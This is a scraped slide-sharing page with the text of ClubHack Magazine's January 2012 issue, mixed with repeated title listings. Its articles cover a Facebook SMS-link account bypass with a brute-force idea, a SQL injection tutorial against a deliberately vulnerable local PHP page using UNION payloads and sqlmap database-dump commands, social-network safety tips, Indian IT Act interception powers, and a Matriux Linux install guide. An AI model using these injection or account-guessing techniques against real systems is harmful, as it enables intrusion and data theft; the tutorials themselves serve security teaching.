Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan Joshi
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012Clubhack Magazine Issue February 2012
Clubhack Magazine Issue February 2012
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011
 
One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)One link Facebook (Anand Pandey)
One link Facebook (Anand Pandey)
 
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
Scenatio based hacking - enterprise wireless security (Vivek Ramachandran)
 
Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)Pentesting Mobile Applications (Prashant Verma)
Pentesting Mobile Applications (Prashant Verma)
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
 
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)How Android Based Phone Helped Me Win American Idol (Elad Shapira)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
 
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
 

Dernier

Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 

Dernier (20)

Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 

ClubHack Magazine Issue January 2012

  • 1. Issue 24 – Jan 2012 | Page - 1
  • 2. Issue 24 – Jan 2012 | Page - 2
  • 3. Issue 24 – Jan 2012 | Page - 3 which does not contain any user specific One Link Facebook information. The link mentioned above is generated by Can Facebook accounts be hacked? Is it be Facebook by its URL shortening feature. possible to access your account without your The original link behind this shorten URL permission and without knowing your looks like username and password? Unfortunately http://m.facebook.com/story.php?share_id ―YES‖ is the answer. =xxxxxxxxxxxxxxxx&mlid=xxxxxxxxxx&l=x xxxxxxx Yes it is possible and that too with a single link, a link which can bypass all the This is the link generated for your shared authentication and security mechanism content on Facebook, so whenever someone implemented by Facebook for user security comments on your shared content this link and privacy. No need of username, is generate and sent to your registered cell password, no checkpoint, and neither any phone number with the comment made. geo-location restriction, most importantly Here ―share_id‖ is the unique id of the share there is no active session created, so a user content, ―mlid‖ is the unique numeric id of will never be able to know that someone the Facebook and ―l‖ is the 8 character long accessed his/her account. random string, combination of numbers and alphabets in both caps. To make this link What we need is just a key, a random working one need to know only the value of combination that can hit the lock and open ―mlid‖ and the ―l‖, the value of ―share_id‖ it for you. One of the most interesting link does not matter for this. looks like http://fb.me/xxxxxxxxxxxxxx, where series of ―x‖ are the 14 digit random And there is one more type of the link, this key with numbers and alphabet in both is the link generated when someone caps, here targeting this particular link can comments on your photo or comments on a be more beneficial as it can harvest many photo after your comment or tag you in a accounts. This is the only link generated by photo. The link looks like Facebook with its URL shortening feature
  • 4. Issue 24 – Jan 2012 | Page - 4 http://m.facebook.com/photo.php?pid=xxx receive a notification by SMS and this will xxx&id=xxxxxxxxxxxxxxxx&mlid=xxxxxxxx contain this link. Here we simply cannot xx&l=xxxxxxxx neglect the threat of social engineering as the link is on your cell phone and anyone Here ―pid‖ is the unique id of the photo on who can access your phone can also access which the comment is made or tagging is your account. done, ―id‖ is the unique Facebook user id of the user who made the comment or tagged Facebook now fixed it a bit, earlier one key you in, or we can say that it is the Facebook (―l‖) was used repeatedly for two weeks, but user id of the user due to whose action this now it is fixed to expire after every use. Here link and notification is generated, ―mlid‖ fact is that very few users user this link so it and ―l‖ are the same as they were in the would not expire for those unused links. previous mentioned link. Only ―mlid‖ and The only way by which one can prevent ―l‖ are needed for the link to work and the his/her account from being accessed this remaining two can be any random value. way is by not opting for receiving the Then as the link discusses first is the notification by SMS or if already registered shortened for of the link generated for the then by opting out from this service, i.e. to share content, the same is true for this link, avoid it totally. but the shortened for look slightly different A full disclosure can be read here http://fb.me/p/xxxxxxxxxxxxxxx.yyyyyyyy http://withanand.blogspot.com/2011/12/fa cebook-security-bypassed-with-just.html Here series of ―x‖ is the same as the ―id‖ in with a video demonstration. the long URL and ―y‖ as the value of ―l‖ A question arises what can be done using this particular method to hack and access the account? Here a hacker can run a script to check all the possible combinations for a successful entry and can get the access to millions of random Facebook accounts and if lucky may even get the access to Mark Zuckerberg‘s profile, seems scary, well this is just the tip of the ice berg. This link is generated by Facebook itself for the convenience of those users who choose Anand Pandey to receive the notification by SMS on their anandkpandey1@gmail.com cell phone and it will give them direct access Anand Kishore Pandey, has just begin to their account without the need or his journey in the world of cyber security entering username and password every time and works as an Associate Consultant in to view who commented or liked etc. Every K R Information Security Solutions and time someone comments on your photo, or is responsible to conduct Vulnerability on your link, tag you in or comment after Assessment, Penetration Testing and your comment on a photo or link you will ISO 27001 Implementation.
  • 5. Issue 24 – Jan 2012 | Page - 5 A sample code – SQLMAP – Automated Sql Injection Testing <?php $id=$_GET["id"]; Tool $con = mysql_connect("localhost","db- admin","db-name"); Sql injection is one of the most common if (!$con) vulnerability found in web applications { today. Exploiting SQL Injection through die('Could not connect: ' . manual approach is somewhat tedious. mysql_error()); Using flags like ―or 1=1--‖ , ―and 1>2‖ we can } find out if vulnerability is present but mysql_select_db("table-name", exploiting the vulnerability needs altogether $con); different approach. Tools like Sqlmap, Havij $query= "SELECT * FROM table- and Pangolin are helpful in exploiting sql name where id=$id "; injection. echo "<h1>".$query. "</h1>"; $result = mysql_query($query); In this article we will use a sample code while($row = below to showcase how vulnerability can be mysql_fetch_array($result)) exploited manually and then by using { Sqlmap tool. echo $row['id'] . " " . $row['name']; echo "<br />"; } mysql_close($con); ?>
  • 6. Issue 24 – Jan 2012 | Page - 6 Here we have deployed the application with the following code and accessed the url: http://localhost/xampp/1.php?id=1 Which gives us the data present in db for id=1 For order by 4, data retrieved is error that means there are three columns present in this select query. Now, we would play with the url, to dig more details about database. If we give a single quote(‗) in the end of the We have given url as - query we get below screen with unhandled http://localhost/xampp/1.php?id=1 union error message from database. This shows select system_user(), 1, 2from there is a possibility of SQL injection. information_schema.schema_privileges— This would give system user of the database. If we add ―or 1=1‖ in the end of URL we get all the data from that row. This shows that SQL Injection is possible. Similarly, we would find table name, table_schema, columns and data by manipulating the url like given below http://localhost/xampp/1.php?id=1 union select table_name, 1, 2 from information_schema.columns— However, whatever exercise we did to find vulnerability in the web application Now let‘s get into exploiting the manually, can be done using SQLMap Tool vulnerability. Our first task is to find in few minutes. To use this tool, you just number of columns selected in the query. need a python Interpreter and SqlMap tool. We would find that by adding ―order by id=1,2,3…‖ and so on at the end of the URL. We issue following command - sqlmap.py -u http://localhost/xampp/1.php?id= 1 and lots of information about given web application is retrieved in seconds like:
  • 7. Issue 24 – Jan 2012 | Page - 7 GET parameter ‗id‘ is vulnerable and 3 We would now try to find current database, columns are present in the given table. tables, columns, and data, means, complete surgery of the application. So we can give below command options to find all details about the application. sqlmap.py -u http://localhost/xampp/1.php?id= 1 --current-db It gave the name of current database. Let‘s proceed. We got to know that DBMS is MySql 5.0.11, WebServer is Apache 2.2.17 deployed on windows machine. Now, the time is to know all the tables present. sqlmap.py -u http://localhost/xampp/1.php?id= 1 --tables It gave the list of all the tables present in databases.
  • 8. Issue 24 – Jan 2012 | Page - 8 Shahbaz Shantanu Shukla Finally, to retrieve all the data present in database, following command can be used: Shantanu Shukla and Shahbaz both sqlmap.py -u work as Systems Engineer, Enterprise http://localhost/xampp/1.php?id= Security and Risk Management-Cloud, 1 --dump-all Infosys Limited. Shantanu and Shahbaz All the date is retrieved and saved in output did their B.tech in Computer Science folder of sqlmap directory. from Uttar Pradesh Technical University Tool has lot more capabilities and can be in year 2010 used to perform dictionary attacks, create backdoor shell etc. So try it out and Happy hacking 
  • 9. Issue 24 – Jan 2012 | Page - 9
  • 10. Issue 24 – Jan 2012 | Page - 10
  • 11. Issue 24 – Jan 2012 | Page - 11 Social Networking This is the bright and beautiful side of the and its Application social networking considering the following reasons: Security 1. You get to meet your friends, make more and more friends. Social Networks have been an important 2. Be ―cool‖ in your circle virtually part of our life, yes, we tweet for photos we 3. Do things virtually you can‘t in real click, every moment of happiness, sadness life ( Farming, Gamble, construction and the news around, we update our status etc.) if we start a relationship or end one, or even 4. Makes you feel the world is small by travel itinerary and hotel check-ins, movie connecting you to friends and moments, fun with friends, in fact relatives in any part of the world. everything that we do every moment in our life is open to the world we want to share. Play games with friends and make new friends.
  • 12. Issue 24 – Jan 2012 | Page - 12 Also considering the other possible reasons Though there are many reasons for the where social networking sites also form the popularity and also their good impact on best means for reconnaissance for any our life yet as everything has its dark side, hacker, with everyone‘s profile online and even Social Networking is no exception to with every detail to establish your identity that. or details that could help the attacker in any means. This again, is available very easily Security Issues of Social the best easy access to any ones Networking: information. 1. Spam Social Networking sites have been the best 2. Scam boons for Social Engineers, considering the 3. Identity theft case study of a popular American politician 4. Malicious Apps (not named due to various reasons, however 5. Abuse of Trust a simple Google search may help you find more information) whose email account was Why do they work? hacked by just making it out of the information available online made amass Observing the fact that Social Networking news in the world media. sites which now are the best place to find people at a single place gives the attackers a Reason? huge attack surface. People gain trust easily on Social Networking sites, just by a mere Attackers just used the information of her chat and looking at their profile. Trust is available online. Since she was a popular easily gained which requires zero skills of politician attackers only used information hacking. I can possibly classify these available through sites like Google and reasons as:- Wikipedia to answer the security questions 1. Greed she had for her email accounts. This 2. Ignorance questions the true reach of social 3. Fear engineering making it reach beyond the 4. Easy trust expected limitations. Was being popular a reason for that compromise of the account 5. Curiosity or was that really unsecure? To answer this let us understand what made the hack successful.  Security questions were something that was easily available online The purpose of security question is understood as something which is personal to you and the one only you know about it and no one else in this world.
  • 13. Issue 24 – Jan 2012 | Page - 13 How am I being a regular user Spamming affected? And now we have the new spamming Everyone on the social network is equally techniques being used. Recently a spam that affected in one way or the other, either a spread virally on Facebook installed a spam posting all over your wall on facebook extension to the browser and made posts on or either your profile without your notice the friends wall without the users consent. posting all over your friends wall. Most of This is how it looked. them would be embarrassing to you or your friends. This spam looked like any other video shared on the wall, using the name of the user whose wall this spam was shared this post looked genuine , however on clicking the link it asks you to install a YouTube premium extension to your browser to view the video. This extension then carried out the work of spamming. Leaving many confused for what was the reason and how to stop this embarrassing spam from coming through their profile. Many believed Popular issues on Facebook their Facebook account was hacked unable to find the reason, on how this was We have across many spam issues right continuing. from the time we started using Orkut - starting with the ―New colorful theme‖ spam Applications to the ―mobile recharge spam‖ back those years. Many finding interesting games and applications on facebook and also there are other who are annoyed by these requests and posts from these applications. Applications / Games on facebook (which are generally thought to be) are not developed by facebook, rather facebook allows third party developers to host their games and applications on facebook. So it makes a new source for the attackers to build their base for a attacking source. Issues with applications on facebook can be
  • 14. Issue 24 – Jan 2012 | Page - 14  Innumerable requests and notifications from your friends to join them using that application  Possible Spam or Scam  Possible Fraud. Have you ever cared to look at the permissions you provide while using an application? An average facebook profile is believed to Have you ever noticed what information the have authorized 200 applications with application is going to extract from your various access rights. profile. There is a survey which claims that 85% users don‘t bother to look at this How do I protect myself? permission request and allow those rights believing it to be a facebook application or Always remember that your actions online rather ignorance. on a social networking should be in such a way that it won‘t embarrass the ones you are Other issues come with the addiction to sharing it with or rather land yourself in these apps or spending real money for such a situation. gaining extra access or unlocking some features in these apps which make no sense  Don‘t establish trust with any friend in our life. on social networking sites until you make sure is actually your friend. It must be already possible that you have  Read the permissions you provide installed most of the unwanted apps on your while using an application over the facebook, just look at your apps setting tab site. and I am sure it will surprise you!  Also make sure the application you are going to authorize is trusted.  Never fall for free stuff unless it is from a valid source. For, example if there would a new facebook theme available then it won‘t be from a
  • 15. Issue 24 – Jan 2012 | Page - 15 third source rather facebook would itself announce the launch of new themes to its users.  While viewing the external links shared on the Social networking site, make sure the URL is valid.  In case of a video shared make sure the URL is youtube.com rather than believing the thumbnail it generates. Prajwal Panchmahalkar Panchmahalkar@gmail.com Twitter: @pr4jwal  If you look into the above snap you can clearly notice the URL is Prajwal is a Senior Developer at www.youtube.com and also notice Matriux, publishing articles for CHmag the play button present over there, under ―Matriux Vibhag‖ every month. unlike the spam post thumbnail Also a n|u Hyderabad chapter lead. shared earlier Currently pursuing Masters from Texas  Stay away from scams/spams that Tech University, USA. A CEH v6 promise to provide some gift or certified. money.  Use add-ons like no-script, No-Ads to avoid such scripts.  Always install extensions from known sources o Chrome – from chrome store o Firefox – Mozilla add-ons  Make sure you use these social networking sites over secured HTTPS  Share or post only that information which doesn‘t affect any one or you in general.  In fact a simple thought of ―what am I doing?‖ and ―how will this make effect?‖ before every action online can save you from the security issues.
  • 16. Issue 24 – Jan 2012 | Page - 16 Powers of As per the provision Central or State Government or any of its officers for reasons Government under to be recorded in writing, by order, direct any agency of the appropriate Government the Information to intercept, monitor or decrypt or cause the Technology Act, 2000 same to do any information generated, transmitted, received or stored in any computer resource, if satisfied that it is Internet Censorship is today‘s hot topic with necessary or expedient so – the passage of statements by our Honorable Ministers. But the billion dollars question is  In the interest of the sovereignty or ―Can online activities of individuals be integrity of India or censored/monitored in India?‖  Defense of India or  Security of the State or  Friendly relations with foreign States Provisions under the Information or Technology Act, 2000 (IT Act)  To maintain public order or  For preventing incitement to the Sec. 69 - Power to issue directions for commission of any cognizable interception or monitoring or offence or decryption of any information  For investigation of any offence through any computer resource.
  • 17. Issue 24 – Jan 2012 | Page - 17 The subscriber or intermediary or any hosted in any computer resource for the person in-charge of the computer resource reasons mentioned above under Sec. 69. shall, when called upon by any agency, Government has passed the Information extend all facilities and technical assistance Technology (Procedure and Safeguards for to – Blocking for Access of Information by Public) Rules, 2009 to be read with Sec. 69A  Provide access to or secure access to (2). These rules explain the procedure and the computer resource generating safeguards subject to which such blocking transmitting, receiving or storing for access by the public may be carried out. such information; or  Intercept, monitor, or decrypt the The intermediary, who fails to comply with information, as the case may be; or the direction issued under this Section, shall  Provide information stored in be punished with an imprisonment for a computer resource. term which may extend to seven years and also be liable to fine. Further government has also passed the Information Technology (Procedure and Safeguards for Interception, Monitoring and Sec. 69B - Power to authorize to Decryption of Information) Rules, 2009 to monitor and collect traffic data or be read with Section 69 (2). These rules information through any computer explain the procedure and safeguards resource for cyber security. subject to which such interception or monitoring or decryption may be carried The Central Government may, to enhance out. cyber security and for identification, analysis and prevention of intrusion or If the subscriber or intermediary or any spread of computer contaminant in the person who fails to assist the agency, they country, by notification in the Official shall be punished with imprisonment for a Gazette, authorize any agency of the term which may extend to seven years and Government to monitor and collect traffic shall also be liable to fine. data or information generated, transmitted, received or stored in any computer resource. Sec. 69A - Power to issue directions The intermediary or any person in-charge or for blocking for public access of any the computer resource shall provide information through any computer technical assistance and extend all facilities resource to such agency to enable them online access or to secure and provide online access to the Central Government or any of its authorized computer resource generating, transmitting, official for reasons to be recorded in writing, receiving or storing such traffic data or by order, direct any agency of the information. Government or intermediary to block for Government has passed the Information access by the public or cause to be blocked Technology (Procedure and Safeguards for for access by the public any information Interception, Monitoring and Decryption of generated, transmitted, received, stored or Information) Rules, 2009 which explains the procedure and safeguards for
  • 18. Issue 24 – Jan 2012 | Page - 18 monitoring and collecting traffic data or information. Any intermediary who intentionally or knowingly contravenes the provisions of this Act shall be punished with an imprisonment for a term which any extend to three years and shall also be liable to fine. Apart from these provisions the Privacy Act, 2011 has also been drafted and is in the final stages of the passage. The Act has been enacted to provide Right to Privacy to citizens of India which is guaranteed under Article 21 of the Constitution of India. The Act regulates the collection, maintenance, use, and dissemination of the personal information of the citizens of India and also Sagar Rahurkar provides for the penal action in case of contact@sagarrahurkar.com violation of such rights. These rules shall be read with the relevant provisions of the IT Sagar Rahurkar is a Law graduate. He is Act. a techno-legal consultant and a Senior Faculty at Asian School of Cyber Laws. He specializes in Cyber Law, Cyber Crime Investigation, Computer Forensics and Intellectual Property Laws. He teaches and provides consultancy to corporates, law enforcement agencies and education institutes across India. He can be contacted at contact@sagarrahurkar.com.
  • 19. Issue 24 – Jan 2012 | Page - 19
  • 20. Issue 24 – Jan 2012 | Page - 20 Setting up and and simple application to install the Live Getting started with system. Matriux Krypton Getting Started: If you are installing on Hard Disk Drive, Hi Reader, start from "Step 5". Wish you a very happy and prosperous new Step 1: year from team Matriux. 2011 has been a great year for us where we along with Start the virtual box and click ―New‖ and CHmag have made it possible to reach you select Operating System as ―Linux‖ and better. A special thanks to CHmag team for Version as Debian. making it with us. It has been noticed that due to a custom and special installer MID used in Matriux Krypton, many users are confused on how to get Matriux setup on their Hard disk or VirtualBox, so this month we bring you with how to setup and get started with Matriux Krypton, a better way to start 2012. We will also try to make it possible to keep it easy for the new *nix users to understand it and get easy with Matriux. MID: Matriux Disk Installer, named MID is an Step 2: installer specially developed by Mickaël Schoentgen in contribution with Prajwal In this step allocate some RAM to be used Panchmahalkar, inspired by the pureOS by Matriux generally 300MB is version of Debian installer for the version of recommended, however there were no Matriux Krypton making it more compatible problems even with 256MB
  • 21. Issue 24 – Jan 2012 | Page - 21 Step 3: Step 5: Create a Virtual Hard Disk for the Start Matriux in live mode (for hard disk installation (VDI, VMDK is preferred) installation, insert the Disc and boot from usually more than 6GB is recommended. the CD/DVD in the live mode). Step 4: After these start the Virtual machine, since Step 6: it is the first time it will prompt us so that a Disk Image (ISO image) can be mounted. Type the password as toor when prompted. Browse and locate the ISO image. (From here note that ―toor‖ is the root password for Matriux ).
  • 22. Issue 24 – Jan 2012 | Page - 22 Step 7: Step 10: Open up a terminal and type gparted to Now start the Matriux Installer from the start the gparted interface. desktop and It should be easy for you now. If it is a new unallocated partition then Device > Create Partition (else if it is a used disk space then skip the next step and go to formatting it). Step 8: Now create the partitions. Format the Step 11: partitions and close gparted. Go ahead and choose the partition that we Step 9: mounted in the earlier steps. Now open a terminal and mount the partition we just created. mkdir /mnt/matriux mount /dev/sda1 /mnt/matriux
  • 23. Issue 24 – Jan 2012 | Page - 23 Step 12: If you are having a multiple boot at certain step you can choose to install the grub. After a couple of basic steps you will find this – Team Matriux http://matriux.com/ That‘s it we are done. Happy hacking  For any further details/queries mail @ report@matruix.com Follow us at @matriuxtig3r on twitter and http://facebook.com/matriuxtig3r
  • 24. Issue 24 – Jan 2012 | Page - 24